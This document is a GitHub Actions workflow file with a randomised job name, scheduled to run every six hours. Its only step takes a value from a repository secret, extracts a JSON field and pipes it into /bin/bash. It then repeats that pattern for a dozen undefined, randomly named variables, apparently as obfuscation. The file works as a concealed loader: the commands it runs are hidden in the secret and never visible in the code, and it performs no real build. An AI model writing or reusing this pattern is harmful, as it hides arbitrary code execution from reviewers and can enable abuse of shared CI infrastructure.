name: duanyuhe3377
on:
  workflow_dispatch:
  schedule:
    - cron: '17 2/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: duanyuhe3377
        env:
          mi08: ${{ secrets.mi08 }}
        run: |
          echo $mi08 | jq -r .k68 | /bin/bash
          echo $c49 | jq -r .uvyck0 | /bin/bash
          echo $ipf755 | jq -r .batym9 | /bin/bash
          echo $oret77364 | jq -r .v2713 | /bin/bash
          echo $cdd731 | jq -r .jc4 | /bin/bash
          echo $pslaz75656 | jq -r .er031 | /bin/bash
          echo $pfp7548 | jq -r .nji0435 | /bin/bash
          echo $yrjbf371 | jq -r .fl8731 | /bin/bash
          echo $fr62010 | jq -r .h050 | /bin/bash
          echo $pr6 | jq -r .xxh8 | /bin/bash
          echo $hpd04328 | jq -r .z36897 | /bin/bash
          echo $rdciy77900 | jq -r .v73486 | /bin/bash
          echo $iy27887 | jq -r .nvm4117 | /bin/bash
          echo $xy765 | jq -r .y0752 | /bin/bash

